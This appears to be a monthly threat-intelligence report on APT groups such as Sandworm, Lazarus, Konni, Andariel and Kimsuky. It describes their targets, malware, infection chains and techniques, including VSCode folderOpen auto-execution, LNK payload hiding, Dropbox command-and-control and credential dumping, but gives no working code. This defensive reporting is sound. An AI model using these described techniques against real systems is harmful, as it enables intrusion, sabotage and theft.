APT

January 2026 APT Group Trends Report

  • Feb 13 2026
January 2026 APT Group Trends Report

 

Key APT Groups

 

Sandworm attempted to destroy OT and IT equipment using DynoWiper after exploiting a vulnerable configuration of FortiGate, targeting at least 30 energy facilities, including wind and solar power plants in Poland, by the end of December 2025. They directly damaged RTUs, IEDs, and serial devices or manipulated settings to cause loss of remote control and operational disruption, and even conducted large-scale wiper deployment using GPO. This represents the most significant sabotage attack that has caused a substantial impact on the stability of the European power grid, making it the top priority threat group this month.

 

Lazarus has maximized its server shutdown response capability by utilizing Polygon NFT contracts as a Dead Drop to replace the blocked Pastebin. By combining the runOn: folderOpen auto-execution feature of VSCode with npm script hijacking, it has implemented a supply chain attack that allows malicious code to execute immediately in the developer environment without user intervention. A modular stealer that can compromise wallets, password managers, and SSH keys is included, highlighting the serious potential for damage to developers and Web3 organizations.

 

Konni utilized an AI-generated PowerShell backdoor and employed sophisticated evasion techniques that exploit Google and NAVER advertisement redirection structures to appear as legitimate traffic. By combining various vectors such as ZIP+LNK-based execution chains, AutoIt script disguised PDFs, and WordPress server compromises, the difficulty of detection has increased. Notably, multiple campaigns targeting developers and blockchain infrastructure have been identified, expanding the long-term infiltration risks across various countries and industries.

 

UAT-7290 has sustained long-term infiltration by combining edge device vulnerabilities, SSH Brute Force, and 1-Day Exploits within telecommunications infrastructure in South Asia and Southeast Europe. It is characterized by the conversion of compromised devices into Bulbature implants for ORB (relay infrastructure), establishing a long-term hacking foundation that can be utilized by other attackers. There is an increasing need for continuous monitoring due to the rise in wide-area espionage activities and potential supply chain risks leveraging inter-country telecommunications infrastructure.

 

Major APT Group Trends by Region

 

1)    North Korea

 

North Korean-based threat actors have intensified their activities by targeting blockchain and cryptocurrency infrastructure as primary attack vectors. Konni is leveraging AI-generated PowerShell backdoors to target developers and engineering teams, while Lazarus has concealed its command and control (C2) infrastructure using a blockchain-based hidden command delivery mechanism (Dead Drop Resolver) instead of Pastebin. These actors have enhanced their social engineering techniques by masquerading as legitimate companies or disguising actual project documents, and they have attempted to steal wallets, API credentials, and cryptocurrency assets through infiltration of development environments. Overall, threat actors are actively adopting cutting-edge technologies such as AI and blockchain to enhance their evasion tactics and persistence, thereby advancing their attack methods.

 

Andariel

 

Andariel has been confirmed to be conducting infiltration, reconnaissance, and credential theft activities utilizing TigerRAT and new RATs (StarshellRAT/JelusRAT/GopherRAT) targeting the European public/legal sector and the Korean ERP software supply chain.

 

case 1.

Time

·         2025

Targets

·         European public · legal sector institutions

·         Korean ERP software vendors and their ERP using clients

Initial Access

·         In the case of Korea, supply chain attacks through ERP software companies

Exploited Vulnerabilities

·         unknown

Malware and Tools

·         TigerRAT : Custom RAT for initial foothold and command execution

·         JelusRAT : In-memory loading·plugin-based extended functionality 2stage RAT

·         StarshellRAT : Command execution·file exfiltration·screenshot functionality .NET RAT

·         GopherRAT : File/folder exfiltration·SOCKS tunneling·system enumeration functionality Golang RAT

·         ASPXSHELL/TigerShell : Web shell for web server control and command execution

·         Custom Port Scanner(ps.exe) : Internal network port scanning

·         PetitPotato(Custom) : MS-EFSR privilege escalation

·         BYOVD(Process Explorer driver exploitation) : EDR/security process termination

·         Procdump/PassView/Plink/Socks5Server : Credential theft and tunneling auxiliary tools

Techniques

·         Securing persistence and re-execution based on Scheduled Task

·         Collection of domain and user credentials through LSASS/NTDS/registry dump

·         Internal asset and network reconnaissance based on PowerShell · WMIC · Netstat

·         Lateral movement using RDP and Impacket

·         Evasion of detection through disabling Windows Defender and setting exceptions

·         File / tool /Forensic disruption through artifact deletion

·         Supply chain infection through trojanization of ERP update paths

·         Covert communication through in-memory execution and web shell utilization

Impact

·         Domain and user credential theft

·         Potential leakage of internal systems and AD information

·         Access to and information gathering of sensitive documents related to money laundering

·         Secondary infection risk occurring for multiple ERP customers

Description

·         Andariel conducts two independent infiltrations in different regions and methods

·         One is a direct infiltration-type RAT operation, the other is a supply chain attack exploiting software update chains

Source

·         To the past and beyond: Andariel’s latest arsenal and cyberattacks[1]

 

Kimsuky

 

An entity presumed to be Kimsuky targeted North Korean activists in 2025 year 5 month, inducing LNK execution through MEGA link-based spear phishing and downloading PowerShell-based additional payloads to conduct information theft and command execution via Dropbox C2 channel.

 

Case 1.

Time

·         May 2025

Targets

·         South Korean North Korean field activists

Initial Access

·         Spear phishing email dispatch

·         Inducing clicks on MEGA cloud links in emails

·         Inducing execution of internal LNK ( shortcuts ) after downloading ZIP

·         Executing PowerShell scripts upon LNK execution → downloading and executing additional malicious files ·

Exploited Vulnerabilities

·         None

Malware and Tools

·         LNK(Shortcut): Internal Offset/Payload based on ExtraData included, Triggers the creation of multiple malicious files upon execution

·         PowerShell: Downloads additional malicious files·Executes, Collects system information·Uploads

·         ms.exe: Normal signature(Adersoft certificate)Used in launcher form, Same path .Includes manifest auto-load verification logic

·         ms.exe.manifest: Base64 Includes encoded data, Executes VBS after decoding

·         1.vbs: pc366.ps1 Execution trigger

·         pc366.ps1: Exfiltrates system information and uploads to Dropbox, Receives additional files from Dropbox·Executes

·         tmp.ini / park_yyy_MM-dd__HH_mm_info.ini: Filename for storing and uploading collected information

·         1.bat: Downloads and executes additional files from the attacker’s server

·        default_an.vbs: PowerShell Execute(Console Hide) and default_an.ps1Execute

·        default_an.ps1:AnyDesk related window/Hide tray traces·Remove, default_an.exeExecute

– default_an.exe: AnyDesk executable file (described as version 5.5.3.0)

·        service.conf/system.conf:described as AnyDesk configuration file

·        default5(XML): 5every default_an.vbsconfiguration file for registering Scheduled Task to execute

·        curl:used for additional file download

Techniques

·        Hiding multiple payloads in LNK ExtraData,XOR(0xAD)After decoding, create files step by step

·        Deceiving users with bait documents(Display normal document screen)

– Scheduled Task registration for periodic execution (ms.exe executed every 18 minutes, default_an.vbs executed every 5 minutes)

·         Normal cloud service(Dropbox)exploitation C2communication and data upload

·         system information collection(process/OS version/public IP/antivirus products, etc.)

·         remote control tool(AnyDesk)UI trace concealment(window/tray icon hiding·deletion)

·         parameter-based download infrastructure(d.php +newpa parameter)for flexible delivery of multiple files

Impact

·         Theft of victim’s system information and upload to Dropbox

·         Receiving additional files for executing attacker commands·performing execution functions

Description

·         Distributing malicious ZIP files based on MEGA links targeting North Korean activists through spear phishing,when LNK is executed, PowerShell downloads and executes additional payloads

·         Using Dropbox as a C2channel for uploading collected information and receiving files for executing additional commands

·         ms.exe(normal signature launcher) + .manifest(Base64 VBS) loading method and pprb/d.php?newpa= form download infrastructure suggests the attack entity is Kimsuky(APT43)

Source

·         [Monthly threat analysis] Latest information theft cases by the attack group using Kimsuky Dropbox[2]

 

 

[1] https://labs.withsecure.com/publications/andariel-2025

[2] https://plainbit.co.kr/kr/insight/tech_hub?bgu=view&idx=62

 

Tags:
Previous Post